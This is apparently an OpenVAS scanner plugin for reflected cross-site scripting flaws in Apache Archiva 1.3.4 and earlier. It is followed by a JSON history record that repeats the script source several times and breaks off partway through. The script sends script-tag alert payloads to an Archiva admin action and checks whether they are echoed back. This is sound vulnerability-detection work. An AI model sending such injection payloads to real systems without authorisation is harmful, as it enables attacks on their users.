ID OPENVAS:1361412562310801942 Type openvas Reporter Copyright (c) 2011 Greenbone Networks GmbH Modified 2018-10-20T00:00:00
Description
This host is running Apache Archiva and is prone to multiple
vulnerabilities.
##############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_apache_archiva_multiple_vuln.nasl 11997 2018-10-20 11:59:41Z mmartin $
#
# Apache Archiva Multiple Vulnerabilities
#
# Authors:
# Antu Sanadi <santu@secpod.com>
#
# Copyright:
# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
################################################################################
CPE = "cpe:/a:apache:archiva";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.801942");
script_version("$Revision: 11997 $");
script_tag(name:"last_modification", value:"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $");
script_tag(name:"creation_date", value:"2011-06-02 11:54:09 +0200 (Thu, 02 Jun 2011)");
script_tag(name:"cvss_base", value:"6.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2011-1077", "CVE-2011-1026");
script_name("Apache Archiva Multiple Vulnerabilities");
script_xref(name:"URL", value:"http://archiva.apache.org/security.html");
script_xref(name:"URL", value:"http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt");
script_tag(name:"qod_type", value:"remote_vul");
script_category(ACT_ATTACK);
script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
script_family("Web application abuses");
script_dependencies("gb_apache_archiva_detect.nasl");
script_mandatory_keys("apache_archiva/installed");
script_require_ports("Services/www", 8080);
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to inject arbitrary
HTML codes, theft of cookie-based authentication credentials, arbitrary URL redirection, disclosure or
modification of sensitive data and phishing attacks.");
script_tag(name:"affected", value:"Apache Archiva version 1.3.4 and prior.");
script_tag(name:"insight", value:"Multiple flaws are due to insufficient input validation in the input
fields throughout the application. Successful exploitation could allow an attacker to compromise the
application.");
script_tag(name:"solution", value:"Upgrade to Apache Archiva Version 1.3.5 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"summary", value:"This host is running Apache Archiva and is prone to multiple
vulnerabilities.");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE))
exit(0);
if (!dir = get_app_location(cpe: CPE, port: port))
exit(0);
if (dir == "/")
dir = "";
req = http_get(item:string(dir, "/admin/addLegacyArtifactPath!commit.action?" +
"legacyArtifactPath.path=test<script>alert('XSS-TEST')<%2Fscri" +
"pt>&groupId=test<script>alert('XSS-TEST')<%2Fscript>&artifact" +
"Id=test<script>alert('XSS-TEST')<%2Fscript>&version=test<scri" +
"pt>alert('XSS-TEST')<%2Fscript>&classifier=test<script>alert" +
"('XSS-TEST')<%2Fscript>&type=test<script>alert('XSS-TEST')<%" +
"2Fscript>"), port:port);
rcvRes = http_keepalive_send_recv(port:port, data:req);
if(rcvRes =~ "HTTP/1\.. 200" && "test<script>alert('XSS-TEST')</script>/test" >< rcvRes){
security_message(port);
exit(0);
}
exit(0);
{"id": "OPENVAS:1361412562310801942", "bulletinFamily": "scanner", "title": "Apache Archiva Multiple Vulnerabilities", "description": "This host is running Apache Archiva and is prone to multiple\nvulnerabilities.", "published": "2011-06-02T00:00:00", "modified": "2018-10-20T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801942", "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "references": ["http://archiva.apache.org/security.html", "http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt"], "cvelist": ["CVE-2011-1026", "CVE-2011-1077"], "type": "openvas", "lastseen": "2019-05-29T18:39:52", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-1026", "CVE-2011-1077"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This host is running Apache Archiva and is prone to multiple\nvulnerabilities.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "4056e05f2a50819e707faa2d8abaf2c94747d1be5ab55c8bfa99c11e626553f6", "hashmap": [{"hash": "7ae18b64588b79e46ec0a1db047527f1", "key": "description"}, {"hash": "d1f7a427f76adb256a3178e5a00db6de", "key": "title"}, {"hash": "5b3e78bf2118fdcf240d0771f3c6039e", "key": "reporter"}, {"hash": "8d7239ed78f256629e274c8450cab5c7", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "64137e6fed32f9ab07b1dad6e3f1e5c7", "key": "href"}, {"hash": "4e7266e7f33e199ae4ae1c46ebd156e6", "key": "pluginID"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "5ec26d28aca48dd3c644d563fbdea9da", "key": "cvelist"}, {"hash": "ebc8d9125ff37cd02a5905ffb4940c9e", "key": "modified"}, {"hash": "a43a99f117e95746b14a6b68f70dd1f6", "key": "references"}, {"hash": "110dbfc9f4642aa516b7aad95ce24e92", "key": "published"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801942", "id": "OPENVAS:1361412562310801942", "lastseen": "2017-09-19T12:02:50", "modified": "2017-09-18T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310801942", "published": "2011-06-02T00:00:00", "references": ["http://archiva.apache.org/security.html", "http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt"], "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archiva_multiple_vuln.nasl 7170 2017-09-18 10:35:33Z cfischer $\n#\n# Apache Archiva Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n################################################################################\n\nCPE = \"cpe:/a:apache:archiva\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801942\");\n script_version(\"$Revision: 7170 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-18 12:35:33 +0200 (Mon, 18 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-02 11:54:09 +0200 (Thu, 02 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1077\", \"CVE-2011-1026\");\n script_name(\"Apache Archiva Multiple Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://archiva.apache.org/security.html\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\");\n script_mandatory_keys(\"apache_archiva/installed\");\n script_require_ports(\"Services/www\", 8080);\n script_tag(name : \"impact\" , value : \"Successful exploitation will allow remote attackers to inject arbitrary\nHTML codes, theft of cookie-based authentication credentials, arbitrary URL redirection, disclosure or\nmodification of sensitive data and phishing attacks.\n\nImpact Level: Application\");\n script_tag(name : \"affected\" , value : \"Apache Archiva version 1.3.4 and prior.\");\n script_tag(name : \"insight\" , value : \"Multiple flaws are due to insufficient input validation in the input\nfields throughout the application. Successful exploitation could allow an attacker to compromise the\napplication.\");\n script_tag(name : \"solution\" , value : \"Upgrade to Apache Archiva Version 1.3.5 or later.\");\n script_tag(name : \"summary\" , value : \"This host is running Apache Archiva and is prone to multiple\nvulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\n## Try expliot and check response\nreq = http_get(item:string(dir, \"/admin/addLegacyArtifactPath!commit.action?\" +\n \"legacyArtifactPath.path=test<script>alert('XSS-TEST')<%2Fscri\" +\n \"pt>&groupId=test<script>alert('XSS-TEST')<%2Fscript>&artifact\" +\n \"Id=test<script>alert('XSS-TEST')<%2Fscript>&version=test<scri\" +\n \"pt>alert('XSS-TEST')<%2Fscript>&classifier=test<script>alert\" +\n \"('XSS-TEST')<%2Fscript>&type=test<script>alert('XSS-TEST')<%\" +\n \"2Fscript>\"), port:port);\n\nrcvRes = http_keepalive_send_recv(port:port, data:req);\n\n## Confirm the exploit\nif(rcvRes =~ \"HTTP/1\\.. 200\" && \"test<script>alert('XSS-TEST')</script>/test\" >< rcvRes){\n security_message(port);\n exit(0);\n}\n\nexit(0);\n", "title": "Apache Archiva Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-09-19T12:02:50"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-1026", "CVE-2011-1077"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This host is running Apache Archiva and is prone to multiple\nvulnerabilities.", "edition": 5, "enchantments": {"dependencies": {"modified": "2018-10-22T16:44:57", "references": [{"idList": ["PACKETSTORM:101797", "PACKETSTORM:101798", "PACKETSTORM:101748"], "type": "packetstorm"}, {"idList": ["SSV:20598"], "type": "seebug"}, {"idList": ["SECURITYVULNS:DOC:26450", "SECURITYVULNS:DOC:26449", "SECURITYVULNS:DOC:26423", "SECURITYVULNS:VULN:11698", "SECURITYVULNS:DOC:26422"], "type": "securityvulns"}, {"idList": ["CVE-2011-1026", "CVE-2011-1077"], "type": "cve"}, {"idList": ["ARCHIVA_1_3_5.NASL"], "type": "nessus"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "e78a4ad33905606b648a50874a1db34470f897738954fe798257bc87988e152f", "hashmap": [{"hash": "7ae18b64588b79e46ec0a1db047527f1", "key": "description"}, {"hash": "00c9ac7d63cb86cab87ea36f3f7df2fe", "key": "sourceData"}, {"hash": "d1f7a427f76adb256a3178e5a00db6de", "key": "title"}, {"hash": "5b3e78bf2118fdcf240d0771f3c6039e", "key": "reporter"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "2c104a45bc8ee43625332611b190dc40", "key": "modified"}, {"hash": "64137e6fed32f9ab07b1dad6e3f1e5c7", "key": "href"}, {"hash": "4e7266e7f33e199ae4ae1c46ebd156e6", "key": "pluginID"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "5ec26d28aca48dd3c644d563fbdea9da", "key": "cvelist"}, {"hash": "a43a99f117e95746b14a6b68f70dd1f6", "key": "references"}, {"hash": "110dbfc9f4642aa516b7aad95ce24e92", "key": "published"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801942", "id": "OPENVAS:1361412562310801942", "lastseen": "2018-10-22T16:44:57", "modified": "2018-10-20T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310801942", "published": "2011-06-02T00:00:00", "references": ["http://archiva.apache.org/security.html", "http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt"], "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archiva_multiple_vuln.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# Apache Archiva Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n################################################################################\n\nCPE = \"cpe:/a:apache:archiva\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801942\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-02 11:54:09 +0200 (Thu, 02 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1077\", \"CVE-2011-1026\");\n script_name(\"Apache Archiva Multiple Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://archiva.apache.org/security.html\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\");\n script_mandatory_keys(\"apache_archiva/installed\");\n script_require_ports(\"Services/www\", 8080);\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to inject arbitrary\nHTML codes, theft of cookie-based authentication credentials, arbitrary URL redirection, disclosure or\nmodification of sensitive data and phishing attacks.\");\n script_tag(name:\"affected\", value:\"Apache Archiva version 1.3.4 and prior.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to insufficient input validation in the input\nfields throughout the application. Successful exploitation could allow an attacker to compromise the\napplication.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apache Archiva Version 1.3.5 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"This host is running Apache Archiva and is prone to multiple\nvulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nreq = http_get(item:string(dir, \"/admin/addLegacyArtifactPath!commit.action?\" +\n \"legacyArtifactPath.path=test<script>alert('XSS-TEST')<%2Fscri\" +\n \"pt>&groupId=test<script>alert('XSS-TEST')<%2Fscript>&artifact\" +\n \"Id=test<script>alert('XSS-TEST')<%2Fscript>&version=test<scri\" +\n \"pt>alert('XSS-TEST')<%2Fscript>&classifier=test<script>alert\" +\n \"('XSS-TEST')<%2Fscript>&type=test<script>alert('XSS-TEST')<%\" +\n \"2Fscript>\"), port:port);\n\nrcvRes = http_keepalive_send_recv(port:port, data:req);\n\nif(rcvRes =~ \"HTTP/1\\.. 200\" && \"test<script>alert('XSS-TEST')</script>/test\" >< rcvRes){\n security_message(port);\n exit(0);\n}\n\nexit(0);\n", "title": "Apache Archiva Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-10-22T16:44:57"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-1026", "CVE-2011-1077"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This host is running Apache Archiva and is prone to multiple\nvulnerabilities.", "edition": 1, "enchantments": {}, "hash": "cda61dc4a4e82746b9ca32919d11730e8b71919b003d0f52d4a16945a2154884", "hashmap": [{"hash": "7ae18b64588b79e46ec0a1db047527f1", "key": "description"}, {"hash": "b4a0be8cb614ace252e3355674e1b860", "key": "sourceData"}, {"hash": "d1f7a427f76adb256a3178e5a00db6de", "key": "title"}, {"hash": "5b3e78bf2118fdcf240d0771f3c6039e", "key": "reporter"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "64137e6fed32f9ab07b1dad6e3f1e5c7", "key": "href"}, {"hash": "4e7266e7f33e199ae4ae1c46ebd156e6", "key": "pluginID"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "5ec26d28aca48dd3c644d563fbdea9da", "key": "cvelist"}, {"hash": "a43a99f117e95746b14a6b68f70dd1f6", "key": "references"}, {"hash": "110dbfc9f4642aa516b7aad95ce24e92", "key": "published"}, {"hash": "dfc20e0bc935ec49e080ba5d8f3ad837", "key": "modified"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801942", "id": "OPENVAS:1361412562310801942", "lastseen": "2017-07-02T21:13:32", "modified": "2017-05-23T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310801942", "published": "2011-06-02T00:00:00", "references": ["http://archiva.apache.org/security.html", "http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt"], "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archiva_multiple_vuln.nasl 6195 2017-05-23 10:02:52Z ckuerste $\n#\n# Apache Archiva Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n################################################################################\n\ncpe = \"cpe:/a:apache:archiva\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801942\");\n script_version(\"$Revision: 6195 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-23 12:02:52 +0200 (Tue, 23 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-02 11:54:09 +0200 (Thu, 02 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1077\", \"CVE-2011-1026\");\n script_name(\"Apache Archiva Multiple Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://archiva.apache.org/security.html\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\");\n script_mandatory_keys(\"apache_archiva/installed\");\n script_require_ports(\"Services/www\", 8080);\n script_tag(name : \"impact\" , value : \"Successful exploitation will allow remote attackers to inject arbitrary\nHTML codes, theft of cookie-based authentication credentials, arbitrary URL redirection, disclosure or\nmodification of sensitive data and phishing attacks.\n\nImpact Level: Application\");\n script_tag(name : \"affected\" , value : \"Apache Archiva version 1.3.4 and prior.\");\n script_tag(name : \"insight\" , value : \"Multiple flaws are due to insufficient input validation in the input\nfields throughout the application. Successful exploitation could allow an attacker to compromise the\napplication.\");\n script_tag(name : \"solution\" , value : \"Upgrade to Apache Archiva Version 1.3.5 or later.\");\n script_tag(name : \"summary\" , value : \"This host is running Apache Archiva and is prone to multiple\nvulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\n## Try expliot and check response\nreq = http_get(item:string(dir, \"/admin/addLegacyArtifactPath!commit.action?\" +\n \"legacyArtifactPath.path=test<script>alert('XSS-TEST')<%2Fscri\" +\n \"pt>&groupId=test<script>alert('XSS-TEST')<%2Fscript>&artifact\" +\n \"Id=test<script>alert('XSS-TEST')<%2Fscript>&version=test<scri\" +\n \"pt>alert('XSS-TEST')<%2Fscript>&classifier=test<script>alert\" +\n \"('XSS-TEST')<%2Fscript>&type=test<script>alert('XSS-TEST')<%\" +\n \"2Fscript>\"), port:port);\n\nrcvRes = http_keepalive_send_recv(port:port, data:req);\n\n## Confirm the exploit\nif(rcvRes =~ \"HTTP/1\\.. 200\" && \"test<script>alert('XSS-TEST')</script>/test\" >< rcvRes){\n security_message(port);\n exit(0);\n}\n\nexit(0);\n", "title": "Apache Archiva Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:13:32"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-1026", "CVE-2011-1077"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This host is running Apache Archiva and is prone to multiple\nvulnerabilities.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "4056e05f2a50819e707faa2d8abaf2c94747d1be5ab55c8bfa99c11e626553f6", "hashmap": [{"hash": "7ae18b64588b79e46ec0a1db047527f1", "key": "description"}, {"hash": "d1f7a427f76adb256a3178e5a00db6de", "key": "title"}, {"hash": "5b3e78bf2118fdcf240d0771f3c6039e", "key": "reporter"}, {"hash": "8d7239ed78f256629e274c8450cab5c7", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "64137e6fed32f9ab07b1dad6e3f1e5c7", "key": "href"}, {"hash": "4e7266e7f33e199ae4ae1c46ebd156e6", "key": "pluginID"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "5ec26d28aca48dd3c644d563fbdea9da", "key": "cvelist"}, {"hash": "ebc8d9125ff37cd02a5905ffb4940c9e", "key": "modified"}, {"hash": "a43a99f117e95746b14a6b68f70dd1f6", "key": "references"}, {"hash": "110dbfc9f4642aa516b7aad95ce24e92", "key": "published"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801942", "id": "OPENVAS:1361412562310801942", "lastseen": "2018-09-02T00:04:19", "modified": "2017-09-18T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310801942", "published": "2011-06-02T00:00:00", "references": ["http://archiva.apache.org/security.html", "http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt"], "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archiva_multiple_vuln.nasl 7170 2017-09-18 10:35:33Z cfischer $\n#\n# Apache Archiva Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n################################################################################\n\nCPE = \"cpe:/a:apache:archiva\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801942\");\n script_version(\"$Revision: 7170 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-18 12:35:33 +0200 (Mon, 18 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-02 11:54:09 +0200 (Thu, 02 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1077\", \"CVE-2011-1026\");\n script_name(\"Apache Archiva Multiple Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://archiva.apache.org/security.html\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\");\n script_mandatory_keys(\"apache_archiva/installed\");\n script_require_ports(\"Services/www\", 8080);\n script_tag(name : \"impact\" , value : \"Successful exploitation will allow remote attackers to inject arbitrary\nHTML codes, theft of cookie-based authentication credentials, arbitrary URL redirection, disclosure or\nmodification of sensitive data and phishing attacks.\n\nImpact Level: Application\");\n script_tag(name : \"affected\" , value : \"Apache Archiva version 1.3.4 and prior.\");\n script_tag(name : \"insight\" , value : \"Multiple flaws are due to insufficient input validation in the input\nfields throughout the application. Successful exploitation could allow an attacker to compromise the\napplication.\");\n script_tag(name : \"solution\" , value : \"Upgrade to Apache Archiva Version 1.3.5 or later.\");\n script_tag(name : \"summary\" , value : \"This host is running Apache Archiva and is prone to multiple\nvulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\n## Try expliot and check response\nreq = http_get(item:string(dir, \"/admin/addLegacyArtifactPath!commit.action?\" +\n \"legacyArtifactPath.path=test<script>alert('XSS-TEST')<%2Fscri\" +\n \"pt>&groupId=test<script>alert('XSS-TEST')<%2Fscript>&artifact\" +\n \"Id=test<script>alert('XSS-TEST')<%2Fscript>&version=test<scri\" +\n \"pt>alert('XSS-TEST')<%2Fscript>&classifier=test<script>alert\" +\n \"('XSS-TEST')<%2Fscript>&type=test<script>alert('XSS-TEST')<%\" +\n \"2Fscript>\"), port:port);\n\nrcvRes = http_keepalive_send_recv(port:port, data:req);\n\n## Confirm the exploit\nif(rcvRes =~ \"HTTP/1\\.. 200\" && \"test<script>alert('XSS-TEST')</script>/test\" >< rcvRes){\n security_message(port);\n exit(0);\n}\n\nexit(0);\n", "title": "Apache Archiva Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-09-02T00:04:19"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2011-1026", "CVE-2011-1077"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This host is running Apache Archiva and is prone to multiple\nvulnerabilities.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "5cb9655a01b6cdf08b7d42c64fc2ee0a4a5be2d8bd74ae8355f69ce6b14b4f1c", "hashmap": [{"hash": "7ae18b64588b79e46ec0a1db047527f1", "key": "description"}, {"hash": 